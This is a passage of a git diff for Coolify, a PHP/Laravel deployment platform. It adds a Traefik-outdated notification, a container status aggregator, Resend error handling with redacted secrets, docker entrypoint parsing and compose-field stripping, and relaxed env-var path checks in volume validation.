'.$e->getErrorMessage(), + }; + + // Log detailed error for admin debugging (redact sensitive data) + $emailSettings = $notifiable->emailNotificationSettings ?? instanceSettings(); + data_set($emailSettings, 'smtp_password', '********'); + data_set($emailSettings, 'resend_api_key', '********'); + + send_internal_notification(sprintf( + "Resend Error\nStatus Code: %s\nMessage: %s\nNotification: %s\nEmail Settings:\n%s", + $e->getErrorCode(), + $e->getErrorMessage(), + get_class($notification), + json_encode($emailSettings, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES) + )); + + // Don't report expected errors (invalid keys, validation) to Sentry + if (in_array($e->getErrorCode(), [403, 401, 400])) { + throw NonReportableException::fromException(new \Exception($userMessage, $e->getCode(), $e)); + } + + throw new \Exception($userMessage, $e->getCode(), $e); + } catch (\Resend\Exceptions\TransporterException $e) { + send_internal_notification("Resend Transport Error: {$e->getMessage()}"); + throw new \Exception('Unable to connect to Resend API. Please check your internet connection and try again.'); } catch (\Throwable $e) { // Check if this is a Resend domain verification error on cloud instances if (isCloud() && str_contains($e->getMessage(), 'domain is not verified')) { diff --git a/app/Notifications/Server/TraefikVersionOutdated.php b/app/Notifications/Server/TraefikVersionOutdated.php new file mode 100644 index 000000000..09ef4257d --- /dev/null +++ b/app/Notifications/Server/TraefikVersionOutdated.php @@ -0,0 +1,262 @@ +onQueue('high'); + } + + public function via(object $notifiable): array + { + return $notifiable->getEnabledChannels('traefik_outdated'); + } + + private function formatVersion(string $version): string + { + // Add 'v' prefix if not present for consistent display + return str_starts_with($version, 'v') ? $version : "v{$version}"; + } + + private function getUpgradeTarget(array $info): string + { + // For minor upgrades, use the upgrade_target field (e.g., "v3.6") + if (($info['type'] ?? 'patch_update') === 'minor_upgrade' && isset($info['upgrade_target'])) { + return $this->formatVersion($info['upgrade_target']); + } + + // For patch updates, show the full version + return $this->formatVersion($info['latest'] ?? 'unknown'); + } + + public function toMail($notifiable = null): MailMessage + { + $mail = new MailMessage; + $count = $this->servers->count(); + + $mail->subject("Coolify: Traefik proxy outdated on {$count} server(s)"); + $mail->view('emails.traefik-version-outdated', [ + 'servers' => $this->servers, + 'count' => $count, + ]); + + return $mail; + } + + public function toDiscord(): DiscordMessage + { + $count = $this->servers->count(); + $hasUpgrades = $this->servers->contains(fn ($s) => ($s->outdatedInfo['type'] ?? 'patch_update') === 'minor_upgrade' || + isset($s->outdatedInfo['newer_branch_target']) + ); + + $description = "**{$count} server(s)** running outdated Traefik proxy. Update recommended for security and features.\n\n"; + $description .= "**Affected servers:**\n"; + + foreach ($this->servers as $server) { + $info = $server->outdatedInfo ?? []; + $current = $this->formatVersion($info['current'] ?? 'unknown'); + $latest = $this->formatVersion($info['latest'] ?? 'unknown'); + $upgradeTarget = $this->getUpgradeTarget($info); + $isPatch = ($info['type'] ?? 'patch_update') === 'patch_update'; + $hasNewerBranch = isset($info['newer_branch_target']); + + if ($isPatch && $hasNewerBranch) { + $newerBranchTarget = $info['newer_branch_target']; + $newerBranchLatest = $this->formatVersion($info['newer_branch_latest']); + $description .= "• {$server->name}: {$current} → {$upgradeTarget} (patch update available)\n"; + $description .= " ↳ Also available: {$newerBranchTarget} (latest patch: {$newerBranchLatest}) - new minor version\n"; + } elseif ($isPatch) { + $description .= "• {$server->name}: {$current} → {$upgradeTarget} (patch update available)\n"; + } else { + $description .= "• {$server->name}: {$current} (latest patch: {$latest}) → {$upgradeTarget} (new minor version available)\n"; + } + } + + $description .= "\n⚠️ It is recommended to test before switching the production version."; + + if ($hasUpgrades) { + $description .= "\n\n📖 **For minor version upgrades**: Read the Traefik changelog before upgrading to understand breaking changes and new features."; + } + + return new DiscordMessage( + title: ':warning: Coolify: Traefik proxy outdated', + description: $description, + color: DiscordMessage::warningColor(), + ); + } + + public function toTelegram(): array + { + $count = $this->servers->count(); + $hasUpgrades = $this->servers->contains(fn ($s) => ($s->outdatedInfo['type'] ?? 'patch_update') === 'minor_upgrade' || + isset($s->outdatedInfo['newer_branch_target']) + ); + + $message = "⚠️ Coolify: Traefik proxy outdated on {$count} server(s)!\n\n"; + $message .= "Update recommended for security and features.\n"; + $message .= "📊 Affected servers:\n"; + + foreach ($this->servers as $server) { + $info = $server->outdatedInfo ?? []; + $current = $this->formatVersion($info['current'] ?? 'unknown'); + $latest = $this->formatVersion($info['latest'] ?? 'unknown'); + $upgradeTarget = $this->getUpgradeTarget($info); + $isPatch = ($info['type'] ?? 'patch_update') === 'patch_update'; + $hasNewerBranch = isset($info['newer_branch_target']); + + if ($isPatch && $hasNewerBranch) { + $newerBranchTarget = $info['newer_branch_target']; + $newerBranchLatest = $this->formatVersion($info['newer_branch_latest']); + $message .= "• {$server->name}: {$current} → {$upgradeTarget} (patch update available)\n"; + $message .= " ↳ Also available: {$newerBranchTarget} (latest patch: {$newerBranchLatest}) - new minor version\n"; + } elseif ($isPatch) { + $message .= "• {$server->name}: {$current} → {$upgradeTarget} (patch update available)\n"; + } else { + $message .= "• {$server->name}: {$current} (latest patch: {$latest}) → {$upgradeTarget} (new minor version available)\n"; + } + } + + $message .= "\n⚠️ It is recommended to test before switching the production version."; + + if ($hasUpgrades) { + $message .= "\n\n📖 For minor version upgrades: Read the Traefik changelog before upgrading to understand breaking changes and new features."; + } + + return [ + 'message' => $message, + 'buttons' => [], + ]; + } + + public function toPushover(): PushoverMessage + { + $count = $this->servers->count(); + $hasUpgrades = $this->servers->contains(fn ($s) => ($s->outdatedInfo['type'] ?? 'patch_update') === 'minor_upgrade' || + isset($s->outdatedInfo['newer_branch_target']) + ); + + $message = "Traefik proxy outdated on {$count} server(s)!\n"; + $message .= "Affected servers:\n"; + + foreach ($this->servers as $server) { + $info = $server->outdatedInfo ?? []; + $current = $this->formatVersion($info['current'] ?? 'unknown'); + $latest = $this->formatVersion($info['latest'] ?? 'unknown'); + $upgradeTarget = $this->getUpgradeTarget($info); + $isPatch = ($info['type'] ?? 'patch_update') === 'patch_update'; + $hasNewerBranch = isset($info['newer_branch_target']); + + if ($isPatch && $hasNewerBranch) { + $newerBranchTarget = $info['newer_branch_target']; + $newerBranchLatest = $this->formatVersion($info['newer_branch_latest']); + $message .= "• {$server->name}: {$current} → {$upgradeTarget} (patch update available)\n"; + $message .= " Also: {$newerBranchTarget} (latest: {$newerBranchLatest}) - new minor version\n"; + } elseif ($isPatch) { + $message .= "• {$server->name}: {$current} → {$upgradeTarget} (patch update available)\n"; + } else { + $message .= "• {$server->name}: {$current} (latest patch: {$latest}) → {$upgradeTarget} (new minor version available)\n"; + } + } + + $message .= "\nIt is recommended to test before switching the production version."; + + if ($hasUpgrades) { + $message .= "\n\nFor minor version upgrades: Read the Traefik changelog before upgrading."; + } + + return new PushoverMessage( + title: 'Traefik proxy outdated', + level: 'warning', + message: $message, + ); + } + + public function toSlack(): SlackMessage + { + $count = $this->servers->count(); + $hasUpgrades = $this->servers->contains(fn ($s) => ($s->outdatedInfo['type'] ?? 'patch_update') === 'minor_upgrade' || + isset($s->outdatedInfo['newer_branch_target']) + ); + + $description = "Traefik proxy outdated on {$count} server(s)!\n"; + $description .= "*Affected servers:*\n"; + + foreach ($this->servers as $server) { + $info = $server->outdatedInfo ?? []; + $current = $this->formatVersion($info['current'] ?? 'unknown'); + $latest = $this->formatVersion($info['latest'] ?? 'unknown'); + $upgradeTarget = $this->getUpgradeTarget($info); + $isPatch = ($info['type'] ?? 'patch_update') === 'patch_update'; + $hasNewerBranch = isset($info['newer_branch_target']); + + if ($isPatch && $hasNewerBranch) { + $newerBranchTarget = $info['newer_branch_target']; + $newerBranchLatest = $this->formatVersion($info['newer_branch_latest']); + $description .= "• `{$server->name}`: {$current} → {$upgradeTarget} (patch update available)\n"; + $description .= " ↳ Also available: {$newerBranchTarget} (latest patch: {$newerBranchLatest}) - new minor version\n"; + } elseif ($isPatch) { + $description .= "• `{$server->name}`: {$current} → {$upgradeTarget} (patch update available)\n"; + } else { + $description .= "• `{$server->name}`: {$current} (latest patch: {$latest}) → {$upgradeTarget} (new minor version available)\n"; + } + } + + $description .= "\n:warning: It is recommended to test before switching the production version."; + + if ($hasUpgrades) { + $description .= "\n\n:book: For minor version upgrades: Read the Traefik changelog before upgrading to understand breaking changes and new features."; + } + + return new SlackMessage( + title: 'Coolify: Traefik proxy outdated', + description: $description, + color: SlackMessage::warningColor() + ); + } + + public function toWebhook(): array + { + $servers = $this->servers->map(function ($server) { + $info = $server->outdatedInfo ?? []; + + $webhookData = [ + 'name' => $server->name, + 'uuid' => $server->uuid, + 'current_version' => $info['current'] ?? 'unknown', + 'latest_version' => $info['latest'] ?? 'unknown', + 'update_type' => $info['type'] ?? 'patch_update', + ]; + + // For minor upgrades, include the upgrade target (e.g., "v3.6") + if (($info['type'] ?? 'patch_update') === 'minor_upgrade' && isset($info['upgrade_target'])) { + $webhookData['upgrade_target'] = $info['upgrade_target']; + } + + // Include newer branch info if available + if (isset($info['newer_branch_target'])) { + $webhookData['newer_branch_target'] = $info['newer_branch_target']; + $webhookData['newer_branch_latest'] = $info['newer_branch_latest']; + } + + return $webhookData; + })->toArray(); + + return [ + 'success' => false, + 'message' => 'Traefik proxy outdated', + 'event' => 'traefik_version_outdated', + 'affected_servers_count' => $this->servers->count(), + 'servers' => $servers, + ]; + } +} diff --git a/app/Policies/InstanceSettingsPolicy.php b/app/Policies/InstanceSettingsPolicy.php new file mode 100644 index 000000000..a04f07a28 --- /dev/null +++ b/app/Policies/InstanceSettingsPolicy.php @@ -0,0 +1,25 @@ + \App\Policies\ApiTokenPolicy::class, + // Instance settings policy + \App\Models\InstanceSettings::class => \App\Policies\InstanceSettingsPolicy::class, + // Team policy \App\Models\Team::class => \App\Policies\TeamPolicy::class, diff --git a/app/Services/ContainerStatusAggregator.php b/app/Services/ContainerStatusAggregator.php new file mode 100644 index 000000000..4a17ecdd6 --- /dev/null +++ b/app/Services/ContainerStatusAggregator.php @@ -0,0 +1,251 @@ + $maxRestartCount, + ]); + $maxRestartCount = 0; + } + + if ($maxRestartCount > 1000) { + Log::warning('High maxRestartCount detected', [ + 'maxRestartCount' => $maxRestartCount, + 'containers' => $containerStatuses->count(), + ]); + } + + if ($containerStatuses->isEmpty()) { + return 'exited'; + } + + // Initialize state flags + $hasRunning = false; + $hasRestarting = false; + $hasUnhealthy = false; + $hasUnknown = false; + $hasExited = false; + $hasStarting = false; + $hasPaused = false; + $hasDead = false; + + // Parse each status string and set flags + foreach ($containerStatuses as $status) { + if (str($status)->contains('restarting')) { + $hasRestarting = true; + } elseif (str($status)->contains('running')) { + $hasRunning = true; + if (str($status)->contains('unhealthy')) { + $hasUnhealthy = true; + } + if (str($status)->contains('unknown')) { + $hasUnknown = true; + } + } elseif (str($status)->contains('exited')) { + $hasExited = true; + } elseif (str($status)->contains('created') || str($status)->contains('starting')) { + $hasStarting = true; + } elseif (str($status)->contains('paused')) { + $hasPaused = true; + } elseif (str($status)->contains('dead') || str($status)->contains('removing')) { + $hasDead = true; + } + } + + // Priority-based status resolution + return $this->resolveStatus( + $hasRunning, + $hasRestarting, + $hasUnhealthy, + $hasUnknown, + $hasExited, + $hasStarting, + $hasPaused, + $hasDead, + $maxRestartCount + ); + } + + /** + * Aggregate container statuses from Docker container objects. + * + * @param Collection $containers Collection of Docker container objects with State property + * @param int $maxRestartCount Maximum restart count across containers (for crash loop detection) + * @return string Aggregated status in colon format (e.g., "running:healthy") + */ + public function aggregateFromContainers(Collection $containers, int $maxRestartCount = 0): string + { + // Validate maxRestartCount parameter + if ($maxRestartCount < 0) { + Log::warning('Negative maxRestartCount corrected to 0', [ + 'original_value' => $maxRestartCount, + ]); + $maxRestartCount = 0; + } + + if ($maxRestartCount > 1000) { + Log::warning('High maxRestartCount detected', [ + 'maxRestartCount' => $maxRestartCount, + 'containers' => $containers->count(), + ]); + } + + if ($containers->isEmpty()) { + return 'exited'; + } + + // Initialize state flags + $hasRunning = false; + $hasRestarting = false; + $hasUnhealthy = false; + $hasUnknown = false; + $hasExited = false; + $hasStarting = false; + $hasPaused = false; + $hasDead = false; + + // Parse each container object and set flags + foreach ($containers as $container) { + $state = data_get($container, 'State.Status', 'exited'); + $health = data_get($container, 'State.Health.Status'); + + if ($state === 'restarting') { + $hasRestarting = true; + } elseif ($state === 'running') { + $hasRunning = true; + if ($health === 'unhealthy') { + $hasUnhealthy = true; + } elseif (is_null($health) || $health === 'starting') { + $hasUnknown = true; + } + } elseif ($state === 'exited') { + $hasExited = true; + } elseif ($state === 'created' || $state === 'starting') { + $hasStarting = true; + } elseif ($state === 'paused') { + $hasPaused = true; + } elseif ($state === 'dead' || $state === 'removing') { + $hasDead = true; + } + } + + // Priority-based status resolution + return $this->resolveStatus( + $hasRunning, + $hasRestarting, + $hasUnhealthy, + $hasUnknown, + $hasExited, + $hasStarting, + $hasPaused, + $hasDead, + $maxRestartCount + ); + } + + /** + * Resolve the aggregated status based on state flags (priority-based state machine). + * + * @param bool $hasRunning Has at least one running container + * @param bool $hasRestarting Has at least one restarting container + * @param bool $hasUnhealthy Has at least one unhealthy container + * @param bool $hasUnknown Has at least one container with unknown health + * @param bool $hasExited Has at least one exited container + * @param bool $hasStarting Has at least one starting/created container + * @param bool $hasPaused Has at least one paused container + * @param bool $hasDead Has at least one dead/removing container + * @param int $maxRestartCount Maximum restart count (for crash loop detection) + * @return string Status in colon format (e.g., "running:healthy") + */ + private function resolveStatus( + bool $hasRunning, + bool $hasRestarting, + bool $hasUnhealthy, + bool $hasUnknown, + bool $hasExited, + bool $hasStarting, + bool $hasPaused, + bool $hasDead, + int $maxRestartCount + ): string { + // Priority 1: Restarting containers (degraded state) + if ($hasRestarting) { + return 'degraded:unhealthy'; + } + + // Priority 2: Crash loop detection (exited with restart count > 0) + if ($hasExited && $maxRestartCount > 0) { + return 'degraded:unhealthy'; + } + + // Priority 3: Mixed state (some running, some exited = degraded) + if ($hasRunning && $hasExited) { + return 'degraded:unhealthy'; + } + + // Priority 4: Running containers (check health status) + if ($hasRunning) { + if ($hasUnhealthy) { + return 'running:unhealthy'; + } elseif ($hasUnknown) { + return 'running:unknown'; + } else { + return 'running:healthy'; + } + } + + // Priority 5: Dead or removing containers + if ($hasDead) { + return 'degraded:unhealthy'; + } + + // Priority 6: Paused containers + if ($hasPaused) { + return 'paused:unknown'; + } + + // Priority 7: Starting/created containers + if ($hasStarting) { + return 'starting:unknown'; + } + + // Priority 8: All containers exited (no restart count = truly stopped) + return 'exited'; + } +} diff --git a/app/Traits/CalculatesExcludedStatus.php b/app/Traits/CalculatesExcludedStatus.php new file mode 100644 index 000000000..5219878c0 --- /dev/null +++ b/app/Traits/CalculatesExcludedStatus.php @@ -0,0 +1,166 @@ +filter(function ($container) use ($excludedContainers) { + $labels = data_get($container, 'Config.Labels', []); + $serviceName = data_get($labels, 'com.docker.compose.service'); + + return $serviceName && $excludedContainers->contains($serviceName); + }); + + // Use ContainerStatusAggregator service for state machine logic + $aggregator = new ContainerStatusAggregator; + $status = $aggregator->aggregateFromContainers($excludedOnly); + + // Append :excluded suffix + return $this->appendExcludedSuffix($status); + } + + /** + * Calculate status for containers when all containers are excluded (simplified version). + * + * This version works with status strings (e.g., "running:healthy") instead of full + * container objects, suitable for Sentinel updates that don't have full container data. + * + * @param Collection $containerStatuses Collection of status strings keyed by container name + * @return string Status string with :excluded suffix + */ + protected function calculateExcludedStatusFromStrings(Collection $containerStatuses): string + { + // Use ContainerStatusAggregator service for state machine logic + $aggregator = new ContainerStatusAggregator; + $status = $aggregator->aggregateFromStrings($containerStatuses); + + // Append :excluded suffix + $finalStatus = $this->appendExcludedSuffix($status); + + return $finalStatus; + } + + /** + * Append :excluded suffix to a status string. + * + * Converts status formats like: + * - "running:healthy" → "running:healthy:excluded" + * - "degraded:unhealthy" → "degraded:excluded" (simplified) + * - "paused:unknown" → "paused:excluded" (simplified) + * + * @param string $status The base status string + * @return string Status with :excluded suffix + */ + private function appendExcludedSuffix(string $status): string + { + // For degraded states, simplify to just "degraded:excluded" + if (str($status)->startsWith('degraded')) { + return 'degraded:excluded'; + } + + // For paused/starting/exited states, simplify to just "state:excluded" + if (str($status)->startsWith('paused')) { + return 'paused:excluded'; + } + + if (str($status)->startsWith('starting')) { + return 'starting:excluded'; + } + + if (str($status)->startsWith('exited')) { + return 'exited'; + } + + // For running states, keep the health status: "running:healthy:excluded" + return "$status:excluded"; + } + + /** + * Get excluded containers from docker-compose YAML. + * + * Containers are excluded if: + * - They have exclude_from_hc: true label + * - They have restart: no policy + * + * @param string|null $dockerComposeRaw The raw docker-compose YAML content + * @return Collection Collection of excluded container names + */ + protected function getExcludedContainersFromDockerCompose(?string $dockerComposeRaw): Collection + { + $excludedContainers = collect(); + + if (! $dockerComposeRaw) { + return $excludedContainers; + } + + try { + $dockerCompose = \Symfony\Component\Yaml\Yaml::parse($dockerComposeRaw); + + // Validate structure + if (! is_array($dockerCompose)) { + Log::warning('Docker Compose YAML did not parse to array', [ + 'yaml_length' => strlen($dockerComposeRaw), + 'parsed_type' => gettype($dockerCompose), + ]); + + return $excludedContainers; + } + + $services = data_get($dockerCompose, 'services', []); + + if (! is_array($services)) { + Log::warning('Docker Compose services is not an array', [ + 'services_type' => gettype($services), + ]); + + return $excludedContainers; + } + + foreach ($services as $serviceName => $serviceConfig) { + $excludeFromHc = data_get($serviceConfig, 'exclude_from_hc', false); + $restartPolicy = data_get($serviceConfig, 'restart', 'always'); + + if ($excludeFromHc || $restartPolicy === 'no') { + $excludedContainers->push($serviceName); + } + } + } catch (ParseException $e) { + // Specific YAML parsing errors + Log::warning('Failed to parse Docker Compose YAML for health check exclusions', [ + 'error' => $e->getMessage(), + 'line' => $e->getParsedLine(), + 'snippet' => $e->getSnippet(), + ]); + + return $excludedContainers; + } catch (\Exception $e) { + // Unexpected errors + Log::error('Unexpected error parsing Docker Compose YAML', [ + 'error' => $e->getMessage(), + 'trace' => $e->getTraceAsString(), + ]); + + return $excludedContainers; + } + + return $excludedContainers; + } +} diff --git a/app/Traits/ExecuteRemoteCommand.php b/app/Traits/ExecuteRemoteCommand.php index 4aa5aae8b..58ae5f249 100644 --- a/app/Traits/ExecuteRemoteCommand.php +++ b/app/Traits/ExecuteRemoteCommand.php @@ -219,9 +219,22 @@ private function executeCommandWithProcess($command, $hidden, $customType, $appe $process_result = $process->wait(); if ($process_result->exitCode() !== 0) { if (! $ignore_errors) { + // Check if deployment was cancelled while command was running + if (isset($this->application_deployment_queue)) { + $this->application_deployment_queue->refresh(); + if ($this->application_deployment_queue->status === \App\Enums\ApplicationDeploymentStatus::CANCELLED_BY_USER->value) { + throw new \RuntimeException('Deployment cancelled by user', 69420); + } + } + // Don't immediately set to FAILED - let the retry logic handle it // This prevents premature status changes during retryable SSH errors - throw new \RuntimeException($process_result->errorOutput()); + $error = $process_result->errorOutput(); + if (empty($error)) { + $error = $process_result->output() ?: 'Command failed with no error output'; + } + $redactedCommand = $this->redact_sensitive_info($command); + throw new \RuntimeException("Command execution failed (exit code {$process_result->exitCode()}): {$redactedCommand}\nError: {$error}"); } } } diff --git a/app/View/Components/Forms/EnvVarInput.php b/app/View/Components/Forms/EnvVarInput.php new file mode 100644 index 000000000..4a98e4a51 --- /dev/null +++ b/app/View/Components/Forms/EnvVarInput.php @@ -0,0 +1,94 @@ +canGate && $this->canResource && $this->autoDisable) { + $hasPermission = Gate::allows($this->canGate, $this->canResource); + + if (! $hasPermission) { + $this->disabled = true; + } + } + } + + public function render(): View|Closure|string + { + // Store original ID for wire:model binding (property name) + $this->modelBinding = $this->id; + + if (is_null($this->id)) { + $this->id = new Cuid2; + // Don't create wire:model binding for auto-generated IDs + $this->modelBinding = 'null'; + } + // Generate unique HTML ID by adding random suffix + // This prevents duplicate IDs when multiple forms are on the same page + if ($this->modelBinding && $this->modelBinding !== 'null') { + // Use original ID with random suffix for uniqueness + $uniqueSuffix = new Cuid2; + $this->htmlId = $this->modelBinding.'-'.$uniqueSuffix; + } else { + $this->htmlId = (string) $this->id; + } + + if (is_null($this->name)) { + $this->name = $this->modelBinding !== 'null' ? $this->modelBinding : (string) $this->id; + } + + if ($this->type === 'password') { + $this->defaultClass = $this->defaultClass.' pr-[2.8rem]'; + } + + $this->scopeUrls = [ + 'team' => route('shared-variables.team.index'), + 'project' => route('shared-variables.project.index'), + 'environment' => $this->projectUuid && $this->environmentUuid + ? route('shared-variables.environment.show', [ + 'project_uuid' => $this->projectUuid, + 'environment_uuid' => $this->environmentUuid, + ]) + : route('shared-variables.environment.index'), + 'default' => route('shared-variables.index'), + ]; + + return view('components.forms.env-var-input'); + } +} diff --git a/bootstrap/helpers/constants.php b/bootstrap/helpers/constants.php index 382e2d015..f588b6c00 100644 --- a/bootstrap/helpers/constants.php +++ b/bootstrap/helpers/constants.php @@ -47,6 +47,8 @@ 'neo4j', 'influxdb', 'clickhouse/clickhouse-server', + 'timescaledb/timescaledb', + 'pgvector/pgvector', ]; const SPECIFIC_SERVICES = [ 'quay.io/minio/minio', diff --git a/bootstrap/helpers/docker.php b/bootstrap/helpers/docker.php index 5bccb50f1..4a0faaec1 100644 --- a/bootstrap/helpers/docker.php +++ b/bootstrap/helpers/docker.php @@ -17,24 +17,44 @@ function getCurrentApplicationContainerStatus(Server $server, int $id, ?int $pul if (! $server->isSwarm()) { $containers = instant_remote_process(["docker ps -a --filter='label=coolify.applicationId={$id}' --format '{{json .}}' "], $server); $containers = format_docker_command_output_to_json($containers); + $containers = $containers->map(function ($container) use ($pullRequestId, $includePullrequests) { $labels = data_get($container, 'Labels'); - if (! str($labels)->contains('coolify.pullRequestId=')) { - data_set($container, 'Labels', $labels.",coolify.pullRequestId={$pullRequestId}"); + $containerName = data_get($container, 'Names'); + $hasPrLabel = str($labels)->contains('coolify.pullRequestId='); + $prLabelValue = null; + if ($hasPrLabel) { + preg_match('/coolify\.pullRequestId=(\d+)/', $labels, $matches); + $prLabelValue = $matches[1] ?? null; + } + + // Treat pullRequestId=0 or missing label as base deployment (convention: 0 = no PR) + $isBaseDeploy = ! $hasPrLabel || (int) $prLabelValue === 0; + + // If we're looking for a specific PR and this is a base deployment, exclude it + if ($pullRequestId !== null && $pullRequestId !== 0 && $isBaseDeploy) { + return null; + } + + // If this is a base deployment, include it when not filtering for PRs + if ($isBaseDeploy) { return $container; } + if ($includePullrequests) { return $container; } - if (str($labels)->contains("coolify.pullRequestId=$pullRequestId")) { + if ($pullRequestId !== null && $pullRequestId !== 0 && str($labels)->contains("coolify.pullRequestId={$pullRequestId}")) { return $container; } return null; }); - return $containers->filter(); + $filtered = $containers->filter(); + + return $filtered; } return $containers; @@ -942,6 +962,7 @@ function convertDockerRunToCompose(?string $custom_docker_run_options = null) '--shm-size' => 'shm_size', '--gpus' => 'gpus', '--hostname' => 'hostname', + '--entrypoint' => 'entrypoint', ]); foreach ($matches as $match) { $option = $match[1]; @@ -962,6 +983,38 @@ function convertDockerRunToCompose(?string $custom_docker_run_options = null) $options[$option] = array_unique($options[$option]); } } + if ($option === '--entrypoint') { + $value = null; + // Match --entrypoint=value or --entrypoint value + // Handle quoted strings with escaped quotes: --entrypoint "python -c \"print('hi')\"" + // Pattern matches: double-quoted (with escapes), single-quoted (with escapes), or unquoted values + if (preg_match( + '/--entrypoint(?:=|\s+)(?"(?:\\\\.|[^"])*"|\'(?:\\\\.|[^\'])*\'|[^\s]+)/', + $custom_docker_run_options, + $entrypoint_matches + )) { + $rawValue = $entrypoint_matches['raw']; + // Handle double-quoted strings: strip quotes and unescape special characters + if (str_starts_with($rawValue, '"') && str_ends_with($rawValue, '"')) { + $inner = substr($rawValue, 1, -1); + // Unescape backslash sequences: \" \$ \` \\ + $value = preg_replace('/\\\\(["$`\\\\])/', '$1', $inner); + } elseif (str_starts_with($rawValue, "'") && str_ends_with($rawValue, "'")) { + // Handle single-quoted strings: just strip quotes (no unescaping per shell rules) + $value = substr($rawValue, 1, -1); + } else { + // Handle unquoted values + $value = $rawValue; + } + } + + if ($value && trim($value) !== '') { + $options[$option][] = $value; + $options[$option] = array_values(array_unique($options[$option])); + } + + continue; + } if (isset($match[2]) && $match[2] !== '') { $value = $match[2]; $options[$option][] = $value; @@ -1002,6 +1055,12 @@ function convertDockerRunToCompose(?string $custom_docker_run_options = null) if (! is_null($value) && is_array($value) && count($value) > 0 && ! empty(trim($value[0]))) { $compose_options->put($mapping[$option], $value[0]); } + } elseif ($option === '--entrypoint') { + if (! is_null($value) && is_array($value) && count($value) > 0 && ! empty(trim($value[0]))) { + // Docker compose accepts entrypoint as either a string or an array + // Keep it as a string for simplicity - docker compose will handle it + $compose_options->put($mapping[$option], $value[0]); + } } elseif ($option === '--gpus') { $payload = [ 'driver' => 'nvidia', @@ -1063,6 +1122,44 @@ function generateCustomDockerRunOptionsForDatabases($docker_run_options, $docker return $docker_compose; } +/** + * Remove Coolify's custom Docker Compose fields from parsed YAML array + * + * Coolify extends Docker Compose with custom fields that are processed during + * parsing and deployment but must be removed before sending to Docker. + * + * Custom fields: + * - exclude_from_hc (service-level): Exclude service from health check monitoring + * - content (volume-level): Auto-create file with specified content during init + * - isDirectory / is_directory (volume-level): Mark bind mount as directory + * + * @param array $yamlCompose Parsed Docker Compose array + * @return array Cleaned Docker Compose array with custom fields removed + */ +function stripCoolifyCustomFields(array $yamlCompose): array +{ + foreach ($yamlCompose['services'] ?? [] as $serviceName => $service) { + // Remove service-level custom fields + unset($yamlCompose['services'][$serviceName]['exclude_from_hc']); + + // Remove volume-level custom fields (only for long syntax - arrays) + if (isset($service['volumes'])) { + foreach ($service['volumes'] as $volumeName => $volume) { + // Skip if volume is string (short syntax like 'db-data:/var/lib/postgresql/data') + if (! is_array($volume)) { + continue; + } + + unset($yamlCompose['services'][$serviceName]['volumes'][$volumeName]['content']); + unset($yamlCompose['services'][$serviceName]['volumes'][$volumeName]['isDirectory']); + unset($yamlCompose['services'][$serviceName]['volumes'][$volumeName]['is_directory']); + } + } + } + + return $yamlCompose; +} + function validateComposeFile(string $compose, int $server_id): string|Throwable { $uuid = Str::random(18); @@ -1072,16 +1169,10 @@ function validateComposeFile(string $compose, int $server_id): string|Throwable throw new \Exception('Server not found'); } $yaml_compose = Yaml::parse($compose); - foreach ($yaml_compose['services'] as $service_name => $service) { - if (! isset($service['volumes'])) { - continue; - } - foreach ($service['volumes'] as $volume_name => $volume) { - if (data_get($volume, 'type') === 'bind' && data_get($volume, 'content')) { - unset($yaml_compose['services'][$service_name]['volumes'][$volume_name]['content']); - } - } - } + + // Remove Coolify's custom fields before Docker validation + $yaml_compose = stripCoolifyCustomFields($yaml_compose); + $base64_compose = base64_encode(Yaml::dump($yaml_compose)); instant_remote_process([ "echo {$base64_compose} | base64 -d | tee /tmp/{$uuid}.yml > /dev/null", @@ -1252,3 +1343,36 @@ function generateDockerEnvFlags($variables): string }) ->implode(' '); } + +/** + * Auto-inject -f and --env-file flags into a docker compose command if not already present + * + * @param string $command The docker compose command to modify + * @param string $composeFilePath The path to the compose file + * @param string $envFilePath The path to the .env file + * @return string The modified command with injected flags + * + * @example + * Input: "docker compose build" + * Output: "docker compose -f ./docker-compose.yml --env-file .env build" + */ +function injectDockerComposeFlags(string $command, string $composeFilePath, string $envFilePath): string +{ + $dockerComposeReplacement = 'docker compose'; + + // Add -f flag if not present (checks for both -f and --file with various formats) + // Detects: -f path, -f=path, -fpath (concatenated with path chars: . / ~), --file path, --file=path + // Note: Uses [.~/]|$ instead of \S to prevent false positives with flags like -foo, -from, -feature + if (! preg_match('/(?:^|\s)(?:-f(?:[=\s]|[.\/~]|$)|--file(?:=|\s))/', $command)) { + $dockerComposeReplacement .= " -f {$composeFilePath}"; + } + + // Add --env-file flag if not present (checks for --env-file with various formats) + // Detects: --env-file path, --env-file=path with any whitespace + if (! preg_match('/(?:^|\s)--env-file(?:=|\s)/', $command)) { + $dockerComposeReplacement .= " --env-file {$envFilePath}"; + } + + // Replace only first occurrence to avoid modifying comments/strings/chained commands + return preg_replace('/docker\s+compose/', $dockerComposeReplacement, $command, 1); +} diff --git a/bootstrap/helpers/parsers.php b/bootstrap/helpers/parsers.php index 1deec45d7..e7d875777 100644 --- a/bootstrap/helpers/parsers.php +++ b/bootstrap/helpers/parsers.php @@ -59,11 +59,13 @@ function validateDockerComposeForInjection(string $composeYaml): void if (isset($volume['source'])) { $source = $volume['source']; if (is_string($source)) { - // Allow simple env vars and env vars with defaults (validated in parseDockerVolumeString) + // Allow env vars and env vars with defaults (validated in parseDockerVolumeString) + // Also allow env vars followed by safe path concatenation (e.g., ${VAR}/path) $isSimpleEnvVar = preg_match('/^\$\{[a-zA-Z_][a-zA-Z0-9_]*\}$/', $source); $isEnvVarWithDefault = preg_match('/^\$\{[^}]+:-[^}]*\}$/', $source); + $isEnvVarWithPath = preg_match('/^\$\{[a-zA-Z_][a-zA-Z0-9_]*\}[\/\w\.\-]*$/', $source); - if (! $isSimpleEnvVar && ! $isEnvVarWithDefault) { + if (! $isSimpleEnvVar && ! $isEnvVarWithDefault && ! $isEnvVarWithPath) { try { validateShellSafePath($source, 'volume source'); } catch (\Exception $e) { @@ -310,15 +312,17 @@ function parseDockerVolumeString(string $volumeString): array // Validate source path for command injection attempts // We validate the final source value after environment variable processing if ($source !== null) { - // Allow simple environment variables like ${VAR_NAME} or ${VAR} - // but validate everything else for shell metacharacters + // Allow environment variables like ${VAR_NAME} or ${VAR} + // Also allow env vars followed by safe path concatenation (e.g., ${VAR}/path) $sourceStr = is_string($source) ? $source : $source; // Skip validation for simple environment variable references - // Pattern: ${WORD_CHARS} with no special characters inside + // Pattern 1: ${WORD_CHARS} with no special characters inside + // Pattern 2: ${WORD_CHARS}/path/to/file (env var with path concatenation) $isSimpleEnvVar = preg_match('/^\$\{[a-zA-Z_][a-zA-Z0-9_]*\}$/', 